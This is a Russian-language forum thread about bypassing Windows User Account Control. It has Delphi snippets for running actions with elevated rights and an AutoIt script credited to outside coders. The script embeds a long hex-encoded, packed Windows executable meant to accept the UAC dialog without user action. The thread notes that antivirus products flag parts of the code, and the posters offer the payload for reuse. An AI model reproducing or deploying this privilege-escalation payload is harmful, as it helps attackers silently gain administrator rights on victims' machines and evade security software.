• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Вопрос Обход UAC (Bypass UAC)


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Запускал фак уац от админа,прога типа сработала и выдала окошко "soy admin"
Это окошко и есть знак, что программа запущена от админа !

В чём смысл, если глянешь код основной программы:
Код:
begin
  if (Bypass) then  Messagebox(0, 'Soy admin', '', MB_OK)
			else  Messagebox(0, 'No admin', '', MB_OK); 
end.

Bypass - Это и есть функция которая повышает привелегии, причём там "Обёртка", идёт проверка на x64 или x32, если права повышены успешно, то функция вернёт true и выведет сообщение Messagebox(0, 'Soy admin', '', MB_OK), иначе закроет процесс, чтобы вывелось сообщение No admin а не крах нужно найти и закоментарить этот код exitprocess(0);

В общем если хочешь сделать какие действия, которые блокирует UAC этой прогой, используй её так:
Код:
 if (Bypass) then
begin
Здесь мы выполним действия минуя УАК !!!
end
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Если запускать без админских прав,выдаёт:
Эту программу нужно запускать с админскими правами...

Чтобы она запускалась с админскими правами по умолчанию, нужен манифест:https://ru-sphere.ru/threads/poleznye-procedury-i-funkcii-dlja-delfi.1930/#post-99430 добавить его в ресурсы...

Ну либо перезапускать программу автоматически с повышенными привилегиями...My mind
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Ступил.Я думал,что прога просто вырубает UAC в системе.А это именно для определённого действия требующего админских прав.Она проверяет запускается ли действие от админа и если да,то применяет обход.Так?Понравилось как красиво её назвали на
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
.Она проверяет запускается ли действие от админа и если да,то применяет обход.
Да, если программу попытаться запустить от админа, будет окошко для подтверждения, эта-же штука каким-то образом обходит это предупреждение !

АВ наверное реагируют на сигнатуры FOp и DllDummy я так и не понял что они делают, но весь обход именно там, это похоже какой-то ассемблерный код, или ещё что короче не знаю !Не въехал!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Подсобрал в кучу некоторые наработки испанских кодеров для обхода или отключения UAC.
Код:
    #cs ----------------------------------------------------------------------------
   
     AutoIt Version: 3.3.8.1
     Author: Coded By Scorpio - UAC Elevation By Rohitab Batra
     Script Function:
         Accept the UAC Dialog without user action.
   
    #ce ----------------------------------------------------------------------------
   
    Func sFuckUAC()
        Local $FuckUAC64 = '0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000002D06B4576967DA046967DA046967DA0472FA71047467DA0472FA70043267DA0472FA44046067DA04601F49046A67DA046967DB043A67DA0472FA75046867DA0472FA47046867DA04526963686967DA0400000000000000000000000000000000000000000000000050450000648603004196DD4E0000000000000000F00022000B020A00007000000010000000F00000F066010000000100000000400100000000100000000200000500020000000000050002000000000000800100001000000000000003004081000010000000000000100000000000000000100000000000001000000000000000000000100000000000000000000000B8710100C800000000700100B8010000002001002808000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055505830'
        $FuckUAC64 &= '0000000000F00000001000000000000000040000000000000000000000000000800000E055505831000000000070000000000100006A000000040000000000000000000000000000400000E02E72737263000000001000000070010000040000006E0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D240208'
        $FuckUAC64 &= '494B95EFA84768648C470100E166000000EC000049070088B7DDFFFF48895C2410574881EC70040000488B05F4CF0633C4168424FFBFFFBB60118BD133FF8D4F08FF151C901ED84883F8FF7510488D0D6F2FFFDB84AC0FE8070006CC33C0EB555424201DC8C744F6CBCD6D0638352EDD8F85C0742F901AB0EE7BF71519AD3A8D4C24502F4415142FF6F6916DCB27CD75D9EB050E7C244813D7BDED3BC18F6AC7028C828DCC38FD6CE66D047C0F9C2488ABC45FC3CC32B2FBEF00BF1856574154C2800031CD747F1B8D784C8BE28BF1AEAD5975B7DB910FF848710F845203449CACD74D6ECE18B9E0138F8D11DF3F3B7648B4E9282BDF31448BC6337DDDE4F6D28D4A384BCB8E654034191FC86EB312C88BD03C0FAD498D34AEFBB7B51C1426302B2041B930A64C0FC1CCB675EDD602CF378892FFB1B78526607C28300F850BB8F002FE7F0274069F8C6D0B0B392E51141704740319E4409E8361086EFFAD2D3C0FB6735A040F6A80F90175143C026FBA6F0BB8805C77047509A244EB2184C966DBD9632A0984C007382C7709B0FF0DE9C571435A83F00188444FCDF2345B0B026A77047719E4C06EB7C612E41E5AD8D8180FF38D110CE01EECFBC8D7F03B33DBBD3C3638448D4B4003969D1C76431E33875658E19309EB211E569C12B801FC6E87ECD95B44D8568B4C0941B8D2FD1CF692362DDB'
        $FuckUAC64 &= '7540E61A6E87EC1EEB320DCCAC2425F78C93ADB9E0312BC8AB0D0EE89AB1B1C371ABE624904C104823F2C0E86378AAB00093CFD37BFC415C5F5EAD006F0880B637C9910284CC701181CAB4638443901E206F4B026CD3E7B9809B8CF874796830382E1AE187615418BE648C0731DB839C6C6FC9A85C750A8B46384796C17E4AEB1230CF4375CFF14B3F630C4EDB74217EE8EBFBFFFFE6B6E7E3CF24BF1321D0174B760742E100BC042F900C05AE3E955D410B0778B470022739F24290028002CC66A6F2CEF0660F1F8419183B0D81CB7337DDBEFDC1C11066F7C17C7502F3C30CC9103B091CCCF7ED5DDB4053F1EC2BD9C641182C85D2757F57BBEF7661179C2F43101490C04189A188B8EE97B763094B084F15A9D474168B80C812BA965DF785056BD05D083415B4031E5A6BAD2D7D39432C1B0C443926BF66F71C0D44095B0CE4081AF680FD8F5D3A3514832302C6431801EB070F10B4F7ADBD9F0F7F0120A483C4205BD00BC37DD936BF5808936889701857B158C7786157768BFA2148D8492B049C3FF7CDDB33EDBEF6752D1CB0C70016510A4840BFCBA6C2386C9C168B4483A068FDB86FA1EDB6FF007FFE062D31ECCE1A77FF6FFD20396814753A86F70FB71C3E6683FB41720A055A77046464DB2EC320130712F8F8EDDFF076C02082C70266D136663BD874CBEB2F229D6D17810E747219'
        $FuckUAC64 &= '780C0F392CD6D437D8B60213300566B2B7EDD119C802C32BC19C4CB0B58E91A1484C500417583BB3A12CA07404405FF3284535FC050AFF6FC94439051FE34C6A76B191BCEEC9751ADB3428C38DECF61BCC74E14C2BCA41690411BFCDC8C8B2D20AF9F9C1C2CAB2FC74A1C0C174CAC9C083B0C1CD4A042F05408B48DAFBF2B7080350104C894018482053579C9BE9C83AEE8F0F95C0DA15948340B79D836DEBAE8D800E1F38095030EB0EF6D9B9011C20AC901348300821E00B8F5B6CD80F07CF45EE46402959E9601A23809D3E307370CA1E2220904F212CD9AE2BCD9EA35F399620C1C2FB3758072E742310B430B84D5A35DBBA7061665056E83574040FEB2AF85F937B6305850C7A420603C1813850454FB77F6F6DE3B90B022A481875D82783B85D0ED7759BFB76093998F808F6C352406B3FFF7B5770FC22833DD4DBD04A113620B91C9A64F7EC36CEB9FF0930102A18F49D400EE4A9103F505B837DFBE83C7C30790AB91B226C5607EE588BA78894053E113BF40B6EC8D8C954DB042B08120E61C8C83834093130BC102BEC8774072114760502E1E60DDC1C594803E18C8B15DCE040E1C80233E0036C82FD0D66E0F0D93034044CEB1763E6EAA0171A400816280D1D865F055C908BCE487C3007A191845F8F358C07907406CA03AF4CAEC9003B029F5D474DDB6F87BB38DCDE3D2D1FDB6F'
        $FuckUAC64 &= '58098D602758D6075FCB417B16508E508A7CF06AE04148AE38EC9248672FCFF73009402805F8DA47201FAE196ADD2504515860620DDADF33C94B7AEB220D1D80B714ECDDF6C4DB460E280812BA37766C51DB8DAADB201B4C2F900B6D6F4E1CC705F2D9050934C0B3DDC16C09EC583009C6762BB741BA680B0570DC7A86465A6108665C812D89EE9E23DC175A8601AB884524833D36665BB660530A27182445E018BCBA6A950E86FA81969BF1ACC3D7B03A26761B81963A272051591C2A8B9021F7E9BE0143FD5F4ADAE065E1EC53DB7D1041FC066FB7DAEF21C344895D0C4C0309F3AB163D66C5BD5DE0772D2BFD8A041F88D2FFC302CE75F32C6FAFBB168D1D44BADE18398801C1789E2EB3CAB130384011984069EC20B3AFE2C18E6E037820C2A878F952831C699805EBC48519B3DD1E7EF18B4904E450D5788566BB5B383CA1B40C7DFEB970721A2E7C77FFC0743BC372F58A4A56C64E207F7BA1BF5556EB292A57014404C0443BC27716EC5BDCFE412BD0418BC04A320470CF4201B220F0E32FFD40818A078473D38B460C83643185EDF185E8702D1004187070DB8CCB2D8E02E4716BB8DFA194B13C47202FDD26EFB5A5B98B560C384538F533F9B9B6BD4C9B3FC32F122E45285A986B29555131BB5BE616300069347B55704C297816DBC37BD6099DB04E1DDFFE4B14C49CF60301740980'
        $FuckUAC64 &= '0910F80AE3EB0EBE352A770E027410080F08E388810D634B1C2C3AC607002249AFF0DB06B50206CB75C8EB3FEE42B96F0B0D079FEA40C7F81977084636F7DDA20EAC0C410D0E450DE06DFA70C843FFC268D372BF8D70E2500E58244C8DC0F072B95D745B180373207B28E35DC3D19AC52453203F104EB7DD21F94A06741319B8C0A2B0F56CD1C44C98EB800D4CB628670249609F7E13BB3F213B1D17C72842482E1BF0FF0B7516816E469BC3D4C2031EC82C938E341D49F056EE87B87098736D90E030340E4A61AC8D967B48AC4B9BEA20E49D71E8455BB2A9CCD1A3D009034002644BA6C7C20E4D832591D983FBCAA773E9FE7525D582DB98EC820F24B6A6E5389F53B5EB4536932C6F29FD751258BAEBD4B658B4D816FCE0611B3C6131FB418B4004EBBB4497E008C722F2405B4B1855C805781B7441559973BDC185D2AE6965F2A20DA0C0640B375B07420D0FCE0A68E9A010B0354C97822DE9BCCD15EBE97FFABD98C541BC703938470FAF4103CC4903081B6BFFADC071F90572E981FFE8FD1C1AA70BEDA89564E90EB20B827663F1267F10CD8B14DE811A858E499B561C2CC5B6F823BD5960897E04895E0C9E64DB07BA2EF9862184842638CB26FFADB4F1742D3858BE289F87B648013BF977152BEE6F77BBCF53371D90800A0493D4492BCC75F598EDEE5BE90238189F1A461EB9FEB780'
        $FuckUAC64 &= '08081B1A7FF791C48B4E0481E012F1742783E90417FD4289DF040D740FFFC9B434EB1AB80404B9D9BE4F48B812060C0D0805B8116DFB56A989EAD96608EB039908561F5C6ED77E10E9B90659E62E7A39171BC0C01DABB0920E5FA5AE6DCA3E1384D84CAA6D2C70DB7DD71D88B249C1E204BD58004FDC2A1065BB55BB61C841B1153859DE2CDD9A5E961141D07719E032DC8A03B65BFBBEDFD4410801154DE91876ECE2C16D0EB65A1915495A12DCFD6B2FBFDAEC75BB897EEFA40352A9742383EF670BBDBCDE1783EF0BFFCFDFBBDABBD83A2727BBBB15D6F45E60676EAC104B032AF4BAD660BCBD37EA0F668901655AD475F01A5815E0D0F449A335801D2718CC6E415DA899906A3E5D677078AD05626CDB6020801FF92AE9490DD2CDFFD8F0C48B9E75F8568CC6148AFDE03B4304E46084FF171263B92002374A139A88BD2A2AEB170596FB600B93A732B8224BCC893B0FBAED5760D3AC960E3045E82C85CA0D66693D8E7425DBBED267AE96CF09C012493BCCFFC5EAEE1D89821C03F686405E27DB8F3A68F605D7C30C01BE015CA27D1D04658BA278CFD7594696AD0808CA0CC5EFD8E0EDD76A0550DEA089E983FA057D8DDF54A3150803444B10664189118F5FFBC058F912EBE2261F81FA1A63FF05DC7D13227E191C4288840140E220E1135F9EDD897C1EFF0016CF8A841933DF1737BF21'
        $FuckUAC64 &= '50E3C7EBDED7C2D2088B7C213F0D2CC21D1BC2B31B3A62D7B7EB2B102607D3BD5231137F28DC7408C52B6461A1E05811673CEF477441D76BC5D72F74FC7C5559305FEB64E530DACF2D824354A1E414B9FDEC1C935B1FD210A8988BE426C10568A7EE7E7E81109066EBE8871A030E00203E900BB918308D41583F177814E28EB715503950F0B767DB1ACD251021D2026578F86FB5EC58FB5008129449FFC8E83EB4DC75CC4C2B02806006C35FA8F1D93EC913DC8123F0440109C85E376099040F089A0F5842866418309D5F90411EB2C10C220A67C926679E0D139FCAE8F6B6211388A00EC1C3D605894177740021281901CCDB37D97479660D77CD555BF8906D6DBC83618338855CBD4AF0D6648BC9168339A67CDD1B0CD98B410B53211890BD7790520B5417F30CB2B90B6C30474273D8074E384815942F481E562056BF0D94135001E2056CC20E305EFCC34F98688F84CD8A1A83B906F0C9DEB3974F00202C8D7B58BEDFB23C9F680549C047120FCB0AA559883C056E7F138E8F4ED94F0819C7207BBEF3BD93381FD930B6E91F7B182C70B3BFDAA9413F53617BE33CF4114C3B0C2F91606CBCDD5DCA4812B04D1C1F490C493CB4393AB73AAE94809B29D082D32E8E7B13E015EB020143268BF77557CBD88BD924CD7EBF180E1FD0E0BDE467C02BB90C8D8B1399D9B916407B8C46155C209605'
        $FuckUAC64 &= '2B8B8FEB6BD2F68E74FF25977A26CCAF2195E2126E4240AEFF7420E209D0FD17830D3010FF424824ED314232F307FA76DA56BFF8D0C58B0A81A0C26110A10BBDF7E1411CA4C781C609E67423BBB3740643F73074B9B813981032978362E481B56414BAE589BBD9B76B6B85A20ED790C24383F868D908B1FF7C90F6861236797630B757AD85EB8078675641D40D5E8261D09E792CFD01BAC8B43D1B0C52B01474332A2BD48D6C6310D02B7ACB1516057EB623BB1660137E834B08CE6B2846A303D24A2CCF2B25046C645EC386E75AC886D9185B9648101D96D1C18318F2E4657632725BB038198C4B480D133221135868704E073221788B89C9A643C210C370F389901A83B317BFD7CF3D4F74E6E48B4C3A1C2F1746066453349FB7069078C890F034C58B742B72B748ADAD23303DC214C58D6757DE7959BFF8ED833F9010062BC221E0D5240CA4669154579B0636C4301647A00960B1FE724D70077515E777026960E10487066D48DE0CE3DC2097093147C09630F261561AE01E6BE39A77E9080F4A9CE81638C15D704224E7666055864AD16D36EC8F501DFB9A6E1F0A0CCE1A428F4DE0C1048025B66F5DE0837B14DD27F255D79BA5581BBF2819C220807D9BA205A94B0B4DF0E921DF4E705BE670044D10084BCA7325BAF7ADE360BA54C83E061B4510EB3D21A14267815C83FEB58916AA70EB'
        $FuckUAC64 &= '2CE79645B9680D705F2C4494052806AF7C0F613A68386CBB8795B905745968D7505D7850A0270D156477681BEA24EA55A08DAC0D0C72642462F088B5E0BE1A0BB04192F2B64A05076DC00B4CA470C8A325F9D174ED940055A0C452145E9B1EE35CDAC026385196D9752E8BA52C301235CF17404FCCF8708842988EAF37488CEF142754B255608FBE578ADD09584C7FF1514D13C2008F64677CCDDABB059D8508AFA559D4CD1E870DA8931BE2706A66BB35597415458087393DC16C9FFB26270960480A147D36A2B0AB108A0C8305D0CB5CC806C4E4BFE0F08E1AB08C2830BBFE4238C6885D9B41475DBBED5CCB174175301A5859B2741379605604459F743A4809316FA1E900DBC386D576CD6FD95DF8851698ADAC42FF6006477C78A8C71FCD2E214C826710FA514C4FFFD0B66C3A205294742F1A600F63F030201BA40F386420472818DA0045FF7AB6441BD81D7A73742F3818DC0D1DBDC58DDBD2BF77D1448D40083B0AD0FF0C03D0CD7F7DDBE22D72F2F7ED07117706B83AC381C1FDC6A3A64489B83D110E410F46C01398F0B66F98B244C1040B110D2D8F45A7052FBE04021043A62C461F1F1384B5499114FBFE237A8B3DE4EFBD891818AD15D7BD75845B10980B5010B01C68FB85212D6E02C021DC49895B08033FC1E5726B187320531013415641AD76E345034A790803270DDBF6DB41'
        $FuckUAC64 &= '04F079384D2BF70CE133EA82A8C36FFFA966FE1E6749637148364BC84D894363628B067DC63B370F830F83035E62A937505CC70CFEF8FFF00F826C9D67EB2A4D0BFC830B04E3F1BB130A093B0174198B03642B5D5361A1D54BC7ACA9881B607ADEE2FF7E74817D0063736DE07528113D7AE91E56B7738EBF09CA596CD90E1B962B8521F2DF1604FB406CC604644B4858AC0A05176E45AA8B5303634DD8B69FE3BD970403D7CAC50ACD6E1FBBC5003DC4725458DCFFC66CC3105D6117C3C9021D99F0061F5F6897B617C24155ED450209C7A820745AA1F68D3B1E39177635905618B5DA2DEDDBC072130106760CA80D0CFFB242C1177318EBE58BC20C225C686CD1C7104C068013EB03C56D3B6CA9E937B4DE657355D82C6C37FEC1E30425DF21F472391578EB4F3573314585ED49443B2BA9AF050AFF083B6BFC74282E4319012C34ECFE788D4601B10141BB4844594D3741AF080F2B38BA72B503683FCDA55D445B308C6B40485F415E65C7EB0191E735CDBBAD2871184F0596179E62A402A5E8073DEBF083DFDE76C30F4CA063C8BA080053EDE74701B661440BD1D77DC06E80C6245C34891DD01C959ADD64B4471A007649E1123C6F79155FBB143FC23022724794A20842AF0587D7D86A3AD3E6712357451D036F871D25FAC13DD5CB17C1F805E6BAD0D183E161044E6BC9EF43A342B7F449'
        $FuckUAC64 &= '83FAF60B05FE1B7E57FAE0825CC702FB49905D69182CB4066EBDAA4F4BF7F1075C10803DA4C94505A5598BAA1387CE0D0EE95E4F340149AB3FBA94D92FC1CFDB723E0B0538BED877324B48B8ABBA7DA9B1AA002ABFD148F7EA99FA0348DCB8990506E93FC31110F16D146CE90FBA500F7A83304BAAEC8A09D569704FB932C75B15147D1326314A1EFB702637A715258ECA72359BEDC82EA9A9BD772935712BCA5148B6659390E97D65D7F0C3AC6B304EF06F760DC09BB9B238727B1C701C9403B973D36F7CF1F8450F130D3A7C775C1C230E752C6C220AF6E8B0856083177504431311AD788CE7607780FF05DA68E19660F7F743180C0D756364CE0FB854BBB04CF8B53CFC10CF0010EDE3D62CC94304FC2D188C8F2E0EC043201B740271B5176ED54324CDEB19F90CFCC70B7EB39DED300608254B0B814B18021159C52AD60D6F5EC6861E8DC97CE8E7B221C37B843276F742183A7DC3BCF19F55BA5A5C816318FFEE3783632409ABD6750923036321A3D80434B5F6343DD8F97A107CD84A05396868160CA4B9B0DBDB59EDC113830BFF7CFF033705B0E8468D7E4C2B832DDAB645F902F07C82E9AAF454AD3608B76858E856A52AFA1FB37FE702480C90EC0B7DED362BBBE1F6409E34605B896DCB5D0A2305E8115DE976EE236FAE4983780111EB43D89439415BECB18635007AD5FFCE7724C5'
        $FuckUAC64 &= 'B5055BBB027B7515592AB33FF5FA58EC361F1D85F67FCC72C3BA92B8B28923422048D08380404F3B438E1CF92920FCE0045EACD6C5E9C4D0034063A478044003E8E25580B4906335A2ABBB5DF14C1250D274EE87724FD5065C0C4403D943C4C851A84D981AA08BAD2CD2ADB8E72C2F5448000E7A44385D8A09F4A1A8E145A0FB0EB668C77C2E4ADDE24D38B5428BC2CB450B902A5E036FDB0D4E458BFA0AD27E55B0667405DCD10FE12E37B3B8B958159738D0FDB909EF59C83D28B4B65402243F16A05D3BBEA1224EC566412BC302771533B0D8FAAF512D130FBE4C08E0AE0FED6A9B16EA418863C202FC14C8BAA59BB921058E1D1402A304776CBFD6AFD01D956D2CDEAE072DEE0C32C820A15649E99A2783052BEB858224FC6E37F7B964A5820F8F1027141E28367ECBAF018D0826E14311266C9FC30E594547085325C77603F82C5827B6BD74171FBA23DBC861EC086378E90434C3A1DC16A106FEC608FB3F7017DD0A5758084132BF2D50DA7AEB2452E40B7354BF9EFD16FEC9A68C992BC2D1F8C8F83D3944E02DF6B0183869580D3A1DD5BC7D6B363C54CA560C4C27EB6D41F75577940A95DA6D450BE34FC056A8793F731E6E0FC18D3DD944F87B4584E3AC767BB6B8D1D8AD481B1D894BF3997E26505B155AF616F80F0EA57266B7EA905B6074AC63D34BB8A5C6B6C7054EFF7CDA58A5'
        $FuckUAC64 &= '0FDBB1B544399270482BBA47E027BEDFC440582A93CA08FD2A656660BBEE6D0760BFCD0848BB2A97A4362C82617C14F2A06A29D73166A764A5AF88C016DBBF9A4590448865697D80737BCAF1054CECDC68A14DD0365677645EF4790E4370C3044084D80BC445835DD041787C7AF8C67BC745880B9C03EBB9676D83B75B29D69B2233F50F892229566CB6586D2D06F7A74429A97BC77B2FBD650F8C3B301D7ECBB96908F6088711206E46FDB96F1547365E4E27E770745E1773D3B9D13BFBB275303AB9780C85533C0C33BCEAAFEB4580F8850BB845214EDBE2FDCF66D44C055A5710472D9D7832964A2320480934BF102D9DDCCF2DEC0FB80709ED6010B77AE13C66BD38E479761C4920E8802F0444518D51D25D60EC7BD17E5262EB632783214E2C21191B1F0BE5EB49243E1C5061175FE4DCB424475A208A105A81ED0541379F0364926C87DD892BC0447A0AB1E11286554800804485E0EF8F676C954DEFEB390E0C72F00C36FE887D4A19682D74074DD5463DD6B936B71C49061513064D63D765ADD10B049905280D70D9EE7B294949F7D8F7085E750A5576840BDB0327C0227907E9EB0B91BFE8B8FDE4F7413BFD1B4FFDA274F78D9D60F86680CFB43A1BC923CA0BFBBA4157EDCFCF7F05C31FE9B7025D5D23495DF73B088D42B803F88530BB397E0203C654CBEBD4363CCEF6E741851787'
        $FuckUAC64 &= 'FFC30B88B465E2E5D8AFE4663F74B8300E08380310357CE108CD263DA97511C73BE9754111B6DB648727B53BF90DA3C0FDBED4DE4FF95210742781C75DA363CFBD68231694BEB09323D79AE230DAF77229F642D950D3D00674B9B8B252DD764B49BEFD3AF635C0847EC003C737AB0ED98B4D0533A09540EDD64A3D0C2D98C67DDFACBA8EDF3BF7FC81E780BA1B456216547CB94AE76640F666FB5A0C3616A325F9C31A244F7EAC818CD10740383B7508C3B00C119C21963D9561588E4BC2C97C1D6FA3AAB42B538F60145EF8F521DF027413B8208D78E129EB0989DD98A30C1644465C4C36A8BB56B878452B0902310C751245AB76D5BF93C84D40416C77A2056A8C75B815F73DB13BDA188BD7E8201CE4342BD11508EE0504A82411B04311833D2D1B362D51398A75660D7E61FB58DFEBB517F7796D4F647D6DD65922F7D775131AB1BA510D7E254DC13D0B43F024D31503FD8F1D6BC220FDBAB9EB290683CEFF19C662779140EB1F827DD72CDFEDE096A63334377822AB7482B090931C205761B8F7D052FDBB1CAA328F476CD02EBFC8EC341D9C9978269425E9EF16ACDFDE38E449745004687443B96C9491D822717418A8127714D825BE8729C90B2E299D39081BA6C877E2750EBC180CFCB13E03B11008C6072492C6EE1A6F2E8338362906780234320419E48BC517211C333270274E26F4'
        $FuckUAC64 &= 'B8836DC885740FD60E696F26DBCA5C75E2E31129CCDEB20550200CB4095D84084F326CA09BFCCD05791802724A58402BD47DCEE097FDC2D8708A149B0EF460A69B41EB7B244F833C207238CCFEF00CBF4C8D7C48D01304CBD9EC9550720C502C06CF60282499AC5037F65A0F46049B11538B080C66463657804417247DF2CB3FB5413BC3743E237432B92B23B92DB813229F0814B930A95A54D415780B77545ADD0501E6EE7E68BE8407EB3C0C02EB36C4A42E74BEEF5588A870045CF38BE20D8F63F1C664EB123C366C2836A143EDBF5B28F13874F3E126826BF215B72C55A805A0620742E1E88DA0FD3030091E9D05C83C90F98A03CEFB48B924E260AF33FFA218BDB90D2B0A2F6D0C2C90F6430678FD4AB4842F426D5F70E9D640A82A04FE749063D01D17800FBFF905323DC6D7E20EFEC8F41F486BD294420DDBAF2AE99E3640E1D2AF39D12418E0F9BE95A5387F7525451A154D825295B23A3794B57EB33EC90CC0F6413880AE9A167D0385501F1DFF4B087865A8045BC003454844CF14CF96D90A9C61046609DD30E8D520E01B84F828BBF4102F018138A42B171804829FBFCB7F8B40203D200593193D21060E3D22073DC04DF40265990175246258CC074DA8090883B760C4AB4DFFB7601CE3329B816E1B49C71B139DDC803E7819F427671EC3A003831404CA97B3B597141F2FD41926'
        $FuckUAC64 &= 'FF6B825838173FEAAC0B7848642E484B162CCF3E14AE83216510F21A50F564906707650800629C1BD476EFFA7144627CC7A82D7D859151284D9D0208F552F19BC3DADF72EDA1DDCC2D0B2EF430451748B36C1D3E13390BC9D129420875E9DB1B4B51367036C6078BD91D2BC3B36F92C608FC1A105EA43817B9276256610327063A2FC7765DB86A5A0F430E22669C1DFB606D80ED3E3DFC06EB0EC06EBA64F7C4CFC57A1F6CC6C50FB970A10631C9BB5002C8AEC5C00148D9EBC394065634D01867BB843A2C6D57DAAFF99333FF4013DB6402AB010632E1C705EEB99FA85068D78825E30A67139F1A793C32CDD22CC58358C4C7FE5E10F09A498C8C34DD1DBA06E0F8DEF69D45A2F6852807E80FE3ED0B3AC9EFEE20DCFE72700301F8B63E39077567E6105F4DB766235B3FA0D81CF7FFD348377B7659B4C486190F9CB6B7BBEA765EF1F3750504E874BC63F3966CCCF4F6230730738B93231B0EEB9A92E35FC45FAD434EBA8412E0D190B2ECCE1885E45EB1E80E752605964D2E14DDB618ABA1D95C8CCFF3078B0ACC82F1089AE070B0788BFDC12149FDAC3831A4CC7050ACE10BB6010DF312319889D41ACCA903D26C619DC2115B3626155BA420093C454EC84B34FB44E8372B05716CD6532CD1D0270E96109AA84026FA1672F1330A153483051787C008DB10185B508C584B1B61507BEA9023'
        $FuckUAC64 &= '229C40A6F973DD9F70F89433F677EA35F08D4E03156A1043C6B69C5F011088BB9BDC30BF4BD69B1881FFFCA9C0EE859935632DADB5B6BC145B78D0CEF3B0B06D4A3DD43B723B05ED30F52D28754C07FDD0CFB6B80401E835B1B761EB36DE8563BE5CF53DE7672A41D6A042A63E1455405EB2A829141549DB0E0C368B692014670B76C3DEB23C76471042F36C7237B0A19C907945BCC4492BC5EC1AB80040482B84D7576944B1DF2E853EA86C9AD4485071611BDD68BC974176C3111A6785E0D7633466B8101C18669125B0C3B4E91256143A02072C12B9F4C5A15BD043D44D6EA655EE4FFFADC6A2F9BF8AE188086639337411FFD1867FA0C2A7C30281FAF45272E5285286FFA5404088B42433E27E2B57A7FA3B3007F3DD3D46B698675C3C8C0A063D0646742CEB30C32CCB283038E97B18116663512374170E85B9742C211DB4998390012D00FC1FA96A80540CFB0CC3A196EFF96B0C8E63B410BD381DD9A0D7CA740096EA393974E782FF1B76810A70B672EC0F0B64DB207773041FE9C939C9C676D8DBE841084D4649AA05BEEE4671A17449085AFCE912DB7BB1991FA6084C0D60AB7FFCFB54C589B30683790408AF3807BAE274B6434F848376FE2B149658028F6B767CE781398EC4F7F3856DC08BBBB00FC78307837298D99E0D37F11C9016811D70F25C910C84AE7A2CCF806C13938566'
        $FuckUAC64 &= '8D802CCF8082528FCF802CCF863E928A2A599E4B2EB5028D16B4C77EBA8575BA8EB544C2891B8B93625B34ACB0F7F689C9D72A0E2DAD28E411E4FA0E051017B9366D30A215023FF3DD830CD043F0281D150DD8D170AB2A33E465D8009ED05E1D6D3921B43DA34E2F9A0AC700ACE2D43B6E74430251036642E38D47012042193A22770298EE2C7EE30516B19FBC551A366CA9421900534050C971DBF83B3D8D708D2E34EEBABF8A897A0F353F0735FDFC8A005DA7D5114E7551BFDBAD14B1B363C67A1C434B75B42116F07658C1AA392203C40D367725B20E06271FFDBDB410681875BB2FA92C4B1E5830DB4C89CCD0C19064CF5C535158C4873B500B6F5FC302870B036837564C6191C1FBF68DC8D94189330CD241C701782F6C6C5D32072102B4C298D641BE546BD1B92213B531DE18D5C050BC6B0F94C0471ED6050B771DC6EB1FB603D30B0CCE005BC4011200AE0A16AA297A21341CE1C476B1BB1B80207406050975B82B2870FEB5F7ADABF4E946FE41BD5C5F5E6F19D93E3C3AE32C39390645B4C937D9EBEE1A4D974D75566C8B05319FEB269910FCB1BBA12974F4A73A4184D1751F50A2B9B0B70F70410230D9B8255ADB8DEB0C12BF12CEC2B7DEAD2EE6D1EA6FFFCA8FDB4589D0BDCEBD28B8CBAFEACA162EA19F311333BB24741E45D9F7BDD9AC1030E9307CE99DEF0B72583E183014'
        $FuckUAC64 &= '0CB2F034B85B28893227C118205651A2F9D5104C28D5D31A36F418C2BE05B5F7ED41C1C10CB036DD9F0BB8B8B52DF92F400B561D3481721BAFCC377EAE063681AEA2FB392B755BDF53587B3E4F10E35016DF44396C7A067A34783C9200216A5BD57DA46813ED608918ACB9137F8573AF1DC085290CB00203C9EFDB19C488451610385A046AC2DCB2F0639A6144D49E6E079C96C6ADD9CB81646AA26E2C1DAEC4038460023C5EE5B67FC1BA5B4A8FDC3E55F6DB6BCD5022B64CD31F0F4508D2E63EE41875F7EE2BC709B7E86DD6009E6F9AF0110F8F2FAAE3296D4BE8DE5A00847AC5E354D797E862466D7C87D6BC90AFDD0793C0B2C941BA58D2305F0CD26AC8E045BED0B8D9F510CB3F302D50B805000BAD817FEF8DCD890D220D3BD07345C10903BA0B1BFC4AF7FF66C742950A127203092F4397FA5EC642310D47157243286156DE5E11302B58488D467E638B74E9C5CBD8B777B662FFCF5C17F03E64F8687C0D4C63FFC23FF420BB00080068044D03E5210F4C183BCB0F8DB2663B6E1B3DE149C3B7BD9CAEF77DC32B688B1583B7E08866AE1A54C3FB03D589157111FF412FC04ED8CFB080622F80B4300AB0D7D9AE6C07ACC9572BE552B7517A3BD37C8892A81B0F41DDD76ED58DA37E7C3624FF7B06427CB7FEFE746141F645DE745A06088E5EC18DEA8B0CF05653C7FE7C6E173263EFBA'
